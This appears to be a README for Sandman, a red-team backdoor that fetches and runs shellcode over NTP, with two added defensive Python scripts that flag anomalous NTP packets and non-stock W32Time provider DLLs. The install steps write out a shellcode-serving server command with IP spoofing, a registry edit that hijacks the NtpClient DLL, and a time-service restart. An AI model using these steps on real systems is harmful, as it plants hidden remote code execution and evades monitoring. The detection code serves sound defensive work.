Sandman is an NTP-based backdoor designed to stealthily deliver and execute arbitrary shellcode on hardened networks during red team engagements.
Sandman is an NTP-based backdoor for hardened networks.
This tool is primarily used by penetration testers and red teamers to bypass network defenses by leveraging the often-overlooked NTP protocol to fetch and execute payloads. It enables covert command and control in environments where traditional communication channels are heavily restricted or monitored.
Ensure the backdoor is compiled with the x64 option to avoid compatibility issues. Use IP spoofing carefully to avoid detection and network conflicts. Since NTP traffic is generally allowed through firewalls, monitoring for unusual NTP packets or magic headers can help detect Sandman activity. Contributions and improvements are welcomed via pull requests.
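The last part of the note above is the defender's angle: NTP is usually allowed through firewalls, so the practical control is to look at the NTP packets themselves. The following is an added example and is not part of the Sandman project. It applies only generic structural checks from the NTP specification (RFC 5905 header layout, RFC 7822 extension-field rules) to packets: a malformed version or mode, an impossible stratum, a transmit timestamp that is nowhere near wall-clock time (a sign the timestamp fields carry something other than time), and trailing bytes after the 48-byte header that are neither well-formed extension fields nor a 20/24-byte legacy MAC. The page does not describe how Sandman encodes its data, so the checker deliberately matches no tool-specific marker; the sample packets, `make_packet` and `inspect_ntp_packet` are constructed here for illustration.

```python
"""Structural sanity checks for NTP packets (constructed example, not project code)."""
import struct
from typing import List, Optional

NTP_HEADER_LEN = 48
NTP_EPOCH_OFFSET = 2208988800          # seconds from 1900-01-01 to 1970-01-01
LEGACY_MAC_LENGTHS = (20, 24)          # 4-byte key id + MD5 (16) or SHA-1 (20) digest
MAX_CLOCK_SKEW_SECONDS = 86400         # tolerate a day; a real client clock is far closer


def ntp_to_unix(ts: int) -> float:
    """Convert a 64-bit NTP timestamp (32.32 fixed point) to Unix seconds."""
    return (ts >> 32) - NTP_EPOCH_OFFSET + (ts & 0xFFFFFFFF) / 2 ** 32


def well_formed_trailer(trailer: bytes) -> bool:
    """True if bytes after the header parse as NTPv4 extension fields
    (each at least 16 bytes, length a multiple of 4) followed by an
    optional legacy MAC. Anything else is unexplained payload."""
    pos = 0
    while True:
        remaining = len(trailer) - pos
        if remaining == 0 or remaining in LEGACY_MAC_LENGTHS:
            return True
        if remaining < 16:
            return False
        _field_type, field_len = struct.unpack_from("!HH", trailer, pos)
        if field_len < 16 or field_len % 4 != 0 or field_len > remaining:
            return False
        pos += field_len


def inspect_ntp_packet(pkt: bytes, now: Optional[float] = None) -> List[str]:
    """Return a list of human-readable findings; an empty list means the
    packet looks like ordinary NTP. `now` is Unix time for the skew check."""
    findings: List[str] = []
    if len(pkt) < NTP_HEADER_LEN:
        return [f"short packet: {len(pkt)} bytes, NTP header needs {NTP_HEADER_LEN}"]

    first, stratum = pkt[0], pkt[1]
    version = (first >> 3) & 0x7
    mode = first & 0x7
    if not 1 <= version <= 4:
        findings.append(f"invalid version {version}")
    if mode in (0, 7):
        findings.append(f"reserved/private mode {mode}")
    elif mode == 6:
        findings.append("control-message mode 6 (unusual for time sync)")
    if stratum > 16:
        findings.append(f"stratum {stratum} outside 0..16")

    transmit = struct.unpack("!Q", pkt[40:48])[0]
    if mode == 4 and transmit == 0:
        findings.append("server reply with zero transmit timestamp")
    if transmit and now is not None:
        skew = abs(ntp_to_unix(transmit) - now)
        if skew > MAX_CLOCK_SKEW_SECONDS:
            findings.append(f"transmit timestamp {skew / 86400:.0f} days from wall clock")

    trailer = pkt[NTP_HEADER_LEN:]
    if trailer and not well_formed_trailer(trailer):
        findings.append(f"{len(trailer)} trailing bytes that are neither extension fields nor a MAC")
    return findings


def make_packet(version: int = 4, mode: int = 3, stratum: int = 0,
                transmit_unix: Optional[float] = None, trailer: bytes = b"") -> bytes:
    """Build a constructed NTP packet for testing the checks above."""
    li_vn_mode = (0 << 6) | (version << 3) | mode
    if transmit_unix is None:
        transmit = 0
    else:
        secs = int(transmit_unix) + NTP_EPOCH_OFFSET
        frac = int((transmit_unix - int(transmit_unix)) * 2 ** 32)
        transmit = (secs << 32) | frac
    header = struct.pack("!BBbb", li_vn_mode, stratum, 6, -20)   # LI/VN/mode, stratum, poll, precision
    header += b"\x00" * 12                                        # root delay, root dispersion, ref id
    header += b"\x00" * 24                                        # reference, origin, receive timestamps
    header += struct.pack("!Q", transmit)                         # transmit timestamp
    return header + trailer


if __name__ == "__main__":
    NOW = 1_700_000_000.0  # constructed wall-clock reference
    samples = {
        "normal client request": make_packet(transmit_unix=NOW),
        "request with 24-byte MAC": make_packet(transmit_unix=NOW, trailer=b"\x00" * 24),
        "request with 100 unexplained bytes": make_packet(transmit_unix=NOW, trailer=bytes(range(100))),
        "reply whose timestamp is 10 years off": make_packet(mode=4, stratum=2, transmit_unix=NOW - 10 * 365 * 86400),
        "packet claiming NTP version 7": make_packet(version=7, transmit_unix=NOW),
    }
    for label, pkt in samples.items():
        print(f"{label}: {inspect_ntp_packet(pkt, now=NOW) or 'ok'}")
```

To use this on live traffic, feed the UDP payload of each port-123 datagram (for example from a pcap) to `inspect_ntp_packet` together with the capture time; alert on any non-empty result, and treat repeated findings from one host as a stronger signal than a single malformed packet, since misbehaving SNTP clients do exist.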
Install Python 3.9 for SandmanServer
Install Python dependencies listed in SandmanServer/requirements.txt
Compile SandmanBackdoor using Visual Studio 2022 or CSC with the x64 configuration
Optionally compile SandmanBackdoorTimeProvider with Visual Studio 2022 and DllExport installed
Add a registry key to configure SandmanBackdoorTimeProvider as the NTP client DLL
Restart the Windows w32time service after the registry modification
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
Starts the Sandman server listening on the specified network adapter, serving shellcode payloads from the given URL, optionally spoofing a legitimate IP address.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
Points the NtpClient time provider's DllName value at the SandmanBackdoorTimeProvider DLL, replacing the DLL Windows would otherwise load as its NTP client provider.
sc stop w32time && sc start w32time
Restarts the Windows time service to apply the new NTP provider configuration.
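The two commands above are also the footprint a defender can audit: the W32Time provider registry keys should point at the Windows-supplied DLLs under the system directory, and a DllName that points anywhere else is worth a look. The following is an added example, not part of the Sandman project or of Windows. It reads the TimeProviders subkeys with `winreg` when run on Windows and otherwise takes a dictionary of provider name to DllName, so the audit logic can be exercised offline; the sample values are constructed, and the "expected under system32" rule is an assumption about a default installation (the stock NtpClient and NtpServer providers use w32time.dll there).

```python
"""Audit W32Time time-provider DLL paths (constructed example, not project code)."""
import sys
from typing import Dict, List

TIME_PROVIDERS_KEY = r"SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders"
# Assumption: on a default install every provider DLL lives under the system directory.
SYSTEM32_PREFIXES = ("%systemroot%\\system32\\", "c:\\windows\\system32\\")


def normalize_dll_path(dll_name: str) -> str:
    """Lower-case, strip quotes and unify slashes so prefix checks are robust."""
    return dll_name.strip().strip('"').replace("/", "\\").lower()


def audit_time_providers(providers: Dict[str, str]) -> List[str]:
    """Return one finding per provider whose DllName is not under system32
    or is empty; an empty list means all providers look stock."""
    findings: List[str] = []
    for name, dll_name in providers.items():
        path = normalize_dll_path(dll_name)
        if not path:
            findings.append(f"{name}: empty DllName")
        elif not path.startswith(SYSTEM32_PREFIXES):
            findings.append(f"{name}: DllName outside system32 -> {dll_name}")
    return findings


def read_time_providers_from_registry() -> Dict[str, str]:
    """Collect DllName for every subkey of the TimeProviders key (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("registry read only works on Windows; pass a dict to audit_time_providers")
    import winreg  # imported lazily so the module loads on non-Windows hosts
    providers: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, TIME_PROVIDERS_KEY) as root:
        index = 0
        while True:
            try:
                sub = winreg.EnumKey(root, index)
            except OSError:
                break
            index += 1
            with winreg.OpenKey(root, sub) as key:
                try:
                    providers[sub], _ = winreg.QueryValueEx(key, "DllName")
                except FileNotFoundError:
                    providers[sub] = ""
    return providers


if __name__ == "__main__":
    if sys.platform == "win32":
        sample = read_time_providers_from_registry()
    else:
        # Constructed sample: stock providers plus one pointing at an arbitrary path.
        sample = {
            "NtpClient": r"C:\Path\To\TheDll.dll",
            "NtpServer": r"%SystemRoot%\system32\w32time.DLL",
        }
    for line in audit_time_providers(sample) or ["all time providers under system32"]:
        print(line)
```

Run it from a scheduled job or configuration-baseline check; combine a non-stock DllName with a recent `w32time` service restart in the System event log, and you have the two observable steps of this install sequence.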